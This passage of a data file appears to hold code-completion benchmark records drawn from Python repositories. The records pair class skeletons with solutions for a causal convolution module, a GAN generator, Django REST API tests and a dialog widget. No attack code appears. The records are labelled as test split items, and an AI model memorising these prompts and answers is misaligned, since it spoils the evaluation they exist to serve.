int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n<|end_body_0|>\n\n<|body_start_1|>\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n<|end_body_1|>\n", "revision_id": "bcd20948db7846ee523443ef9fd78c7a1248c95e", "skeleton": "<|skeleton|>\nclass CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n <|body_0|>\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CausalConv1d:\n \"\"\"1D causal convolution module for custom decoder. Args: idim: Input dimension. odim: Output dimension. kernel_size: Size of the convolving kernel. stride: Stride of the convolution. dilation: Spacing between the kernel points. groups: Number of blocked connections from input channels to output channels. bias: Whether to add a learnable bias to the output. batch_norm: Whether to apply batch normalization. relu: Whether to pass final output through ReLU activation. dropout_rate: Dropout rate.\"\"\"\n\n def __init__(self, idim: int, odim: int, kernel_size: int, stride: int=1, dilation: int=1, groups: int=1, bias: bool=True, batch_norm: bool=False, relu: bool=True, dropout_rate: float=0.0):\n \"\"\"Construct a CausalConv1d object.\"\"\"\n super().__init__()\n self.padding = (kernel_size - 1) * dilation\n self.causal_conv1d = torch.nn.Conv1d(idim, odim, kernel_size=kernel_size, stride=stride, padding=self.padding, dilation=dilation, groups=groups, bias=bias)\n self.dropout = torch.nn.Dropout(p=dropout_rate)\n if batch_norm:\n self.bn = torch.nn.BatchNorm1d(odim)\n if relu:\n self.relu_func = torch.nn.ReLU()\n self.batch_norm = batch_norm\n self.relu = relu\n\n def forward(self, sequence: torch.Tensor, mask: torch.Tensor, cache: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Forward CausalConv1d for custom decoder. Args: sequence: CausalConv1d input sequences. (B, U, D_in) mask: Mask of CausalConv1d input sequences. (B, 1, U) Returns: sequence: CausalConv1d output sequences. (B, sub(U), D_out) mask: Mask of CausalConv1d output sequences. (B, 1, sub(U))\"\"\"\n sequence = sequence.transpose(1, 2)\n sequence = self.causal_conv1d(sequence)\n if self.padding != 0:\n sequence = sequence[:, :, :-self.padding]\n if self.batch_norm:\n sequence = self.bn(sequence)\n sequence = self.dropout(sequence)\n if self.relu:\n sequence = self.relu_func(sequence)\n sequence = sequence.transpose(1, 2)\n return (sequence, mask)\n", "source": "the_stack_v2_python_sparse", "source_path": "espnet/nets/pytorch_backend/transducer/conv1d_nets.py", "source_repo": "espnet/espnet", "split": "test", "star_events_count": 7242} {"blob_id": "5d755d25a57408a713ea354bad709ec6e61f0c12", "bodies": ["super(Generator, self).__init__()\nself.conv_dim = conv_dim\nself.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\nself.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\nself.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\nself.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)", "x = self.fc(x)\nx = x.view(-1, self.conv_dim * 4, 4, 4)\nx = F.relu(self.deconv1(x), 0.2)\nx = F.relu(self.deconv2(x), 0.2)\nx = self.deconv3(x)\nx = F.tanh(x)\nreturn x"], "bodies_text": "<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Generator", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000156", "length_bytes": 12896, "license_type": "permissive", "methods": [{"docstring": "Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer", "name": "__init__", "signature": "def __init__(self, z_size, conv_dim=32)"}, {"docstring": "Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005759", "prompt": "Implement the Python class `Generator` described below.\n\nClass description:\nImplement the Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, z_size, conv_dim=32): Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\n- def forward(self, x): Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output", "prompted_full_text": "Implement the Python class `Generator` described below.\n\nClass description:\nImplement the Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, z_size, conv_dim=32): Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\n- def forward(self, x): Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\n\n<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n<|end_body_1|>\n", "revision_id": "b9b54564f94aadfc3c71ff513da0f05ef85d22a8", "skeleton": "<|skeleton|>\nclass Generator:\n\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Generator:\n def __init__(self, z_size, conv_dim=32):\n \"\"\"Initialize the Generator Module :param z_size: The length of the input latent vector, z :param conv_dim: The depth of the inputs to the *last* transpose convolutional layer\"\"\"\n super(Generator, self).__init__()\n self.conv_dim = conv_dim\n self.fc = nn.Linear(z_size, conv_dim * 4 * 4 * 4)\n self.deconv1 = deconv(conv_dim * 4, conv_dim * 2, 4)\n self.deconv2 = deconv(conv_dim * 2, conv_dim, 4)\n self.deconv3 = deconv(conv_dim, 3, 4, batch_norm=False)\n\n def forward(self, x):\n \"\"\"Forward propagation of the neural network :param x: The input to the neural network :return: A 32x32x3 Tensor image as output\"\"\"\n x = self.fc(x)\n x = x.view(-1, self.conv_dim * 4, 4, 4)\n x = F.relu(self.deconv1(x), 0.2)\n x = F.relu(self.deconv2(x), 0.2)\n x = self.deconv3(x)\n x = F.tanh(x)\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "dl/pytorch/gan/face_gan.py", "source_repo": "xta0/Python-Playground", "split": "test", "star_events_count": 0} {"blob_id": "30f126b48c2c2c1b925fdb0453832f01e9b22b0a", "bodies": ["cls.endpoint = '/api/courseadmin/'\ncls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\ncls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\ncls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nrequest = APIRequestFactory().get(self.endpoint)\nforce_authenticate(request, user=self.superuser)\ncourse_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\nresponse = course_admin_view(request)\nself.assertEqual(len(response.data), 1)\ncourse_entry_data = response.data[0]\nself.assertEqual(course_entry_data.get('id'), course_admin.id)\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_200_OK)", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nrequest = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\nforce_authenticate(request, user=self.superuser)\ncourse_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\nresponse = course_admin_view(request, pk=course_admin.id)\ncourse_entry_data = response.data\nself.assertEqual(course_entry_data.get('id'), course_admin.id)\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_200_OK)", "self.client.force_authenticate(user=self.superuser)\nresponse = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\ncourse_entry_data = response.data\nself.assertEqual(course_entry_data.get('admin'), self.administrator.id)\nself.assertEqual(course_entry_data.get('course'), self.course.id)\nself.assertEqual(course_entry_data.get('start'), '2020-01-05')\nself.assertEqual(response.status_code, status.HTTP_201_CREATED)", "course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\nself.client.force_authenticate(user=self.superuser)\nresponse = self.client.delete(f'{self.endpoint}{course_admin.id}/')\nself.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\nwith self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)"], "bodies_text": "<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "class_docstring": "Тесты свзи администратора с курсом", "class_name": "CourseAdminTestCase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000157", "length_bytes": 33302, "license_type": "no_license", "methods": [{"docstring": "Данные для тесткейса", "name": "setUpTestData", "signature": "def setUpTestData(cls)"}, {"docstring": "Список связей администраторов с курсами", "name": "test_course_admin_list", "signature": "def test_course_admin_list(self)"}, {"docstring": "Получение связи администратора с курсом", "name": "test_get_course_admin", "signature": "def test_get_course_admin(self)"}, {"docstring": "Создание связи администратора с курсом", "name": "test_create_course_admin", "signature": "def test_create_course_admin(self)"}, {"docstring": "Удаление связи администратора с курсом", "name": "test_delete_course_admin", "signature": "def test_delete_course_admin(self)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_007272", "prompt": "Implement the Python class `CourseAdminTestCase` described below.\n\nClass description:\nТесты свзи администратора с курсом\n\nMethod signatures and docstrings:\n- def setUpTestData(cls): Данные для тесткейса\n- def test_course_admin_list(self): Список связей администраторов с курсами\n- def test_get_course_admin(self): Получение связи администратора с курсом\n- def test_create_course_admin(self): Создание связи администратора с курсом\n- def test_delete_course_admin(self): Удаление связи администратора с курсом", "prompted_full_text": "Implement the Python class `CourseAdminTestCase` described below.\n\nClass description:\nТесты свзи администратора с курсом\n\nMethod signatures and docstrings:\n- def setUpTestData(cls): Данные для тесткейса\n- def test_course_admin_list(self): Список связей администраторов с курсами\n- def test_get_course_admin(self): Получение связи администратора с курсом\n- def test_create_course_admin(self): Создание связи администратора с курсом\n- def test_delete_course_admin(self): Удаление связи администратора с курсом\n\n<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n<|end_body_0|>\n\n<|body_start_1|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_1|>\n\n<|body_start_2|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n<|end_body_2|>\n\n<|body_start_3|>\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n<|end_body_3|>\n\n<|body_start_4|>\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n<|end_body_4|>\n", "revision_id": "3de0f8eeb4dbf9ec37b17ece0dde51c9e0f381ac", "skeleton": "<|skeleton|>\nclass CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n <|body_0|>\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n <|body_1|>\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n <|body_2|>\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n <|body_3|>\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CourseAdminTestCase:\n \"\"\"Тесты свзи администратора с курсом\"\"\"\n\n def setUpTestData(cls):\n \"\"\"Данные для тесткейса\"\"\"\n cls.endpoint = '/api/courseadmin/'\n cls.course = CourseFactory(name='Course', description='Description', start='2020-01-05', cost=5000, deleted=False)\n cls.administrator = AdministratorFactory(user__username='administrator', user__first_name='Name', user__last_name='Surname', about='About administrator')\n cls.superuser = User.objects.create_superuser(username='superuser', password='password', email='superuser@gmail.com')\n\n def test_course_admin_list(self):\n \"\"\"Список связей администраторов с курсами\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(self.endpoint)\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'list'})\n response = course_admin_view(request)\n self.assertEqual(len(response.data), 1)\n course_entry_data = response.data[0]\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_get_course_admin(self):\n \"\"\"Получение связи администратора с курсом\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n request = APIRequestFactory().get(f'{self.endpoint}{course_admin.id}/')\n force_authenticate(request, user=self.superuser)\n course_admin_view = APICourseAdminViewSet.as_view({'get': 'retrieve'})\n response = course_admin_view(request, pk=course_admin.id)\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('id'), course_admin.id)\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_create_course_admin(self):\n \"\"\"Создание связи администратора с курсом\"\"\"\n self.client.force_authenticate(user=self.superuser)\n response = self.client.post(self.endpoint, {'admin': self.administrator.id, 'course': self.course.id, 'start': '2020-01-05'}, format='json')\n course_entry_data = response.data\n self.assertEqual(course_entry_data.get('admin'), self.administrator.id)\n self.assertEqual(course_entry_data.get('course'), self.course.id)\n self.assertEqual(course_entry_data.get('start'), '2020-01-05')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_delete_course_admin(self):\n \"\"\"Удаление связи администратора с курсом\"\"\"\n course_admin = CourseAdminFactory(admin=self.administrator, course=self.course, start='2020-01-05')\n self.client.force_authenticate(user=self.superuser)\n response = self.client.delete(f'{self.endpoint}{course_admin.id}/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(CourseAdmin.DoesNotExist):\n CourseAdmin.objects.get(id=course_admin.id)\n", "source": "the_stack_v2_python_sparse", "source_path": "education_django/education_app/test_api.py", "source_repo": "ilyaignatyev/python-web-otus-ru", "split": "test", "star_events_count": 0} {"blob_id": "09a1d9ce4b8b9c63666f9c5a1cc054d94e08d07c", "bodies": ["super().__init__(transparent=True)\nself._on_ok = on_ok\nself._on_cancel = on_cancel\nself._panel = Compound()\nself._panel.add_widget(panel_widget)\n_panel_size = panel_widget.get_size(engine)\nwindow_size = engine.get_window_size()\n_panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\nself.add_widget(_panel_topleft, self._panel)\nself._panel.add_widget(panel_widget)\nself._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))", "if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\nelif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\nreturn super().update(control_name)"], "bodies_text": "<|body_start_0|>\n super().__init__(transparent=True)\n self._on_ok = on_ok\n self._on_cancel = on_cancel\n self._panel = Compound()\n self._panel.add_widget(panel_widget)\n _panel_size = panel_widget.get_size(engine)\n window_size = engine.get_window_size()\n _panel_topleft = Point((window_size.width - _panel_size.width) // 2, (window_size.height - _panel_size.height) // 2)\n self.add_widget(_panel_topleft, self._panel)\n self._panel.add_widget(panel_widget)\n self._panel.add_widget(TextLine(font, text), text_shift or Point(0, 0))\n<|end_body_0|>\n\n<|body_start_1|>\n if control_name == 'escape':\n if self._on_cancel:\n self._on_cancel()\n raise self.Finished()\n elif control_name in ['space', 'return']:\n if self._on_ok:\n self._on_ok()\n raise self.Finished()\n return 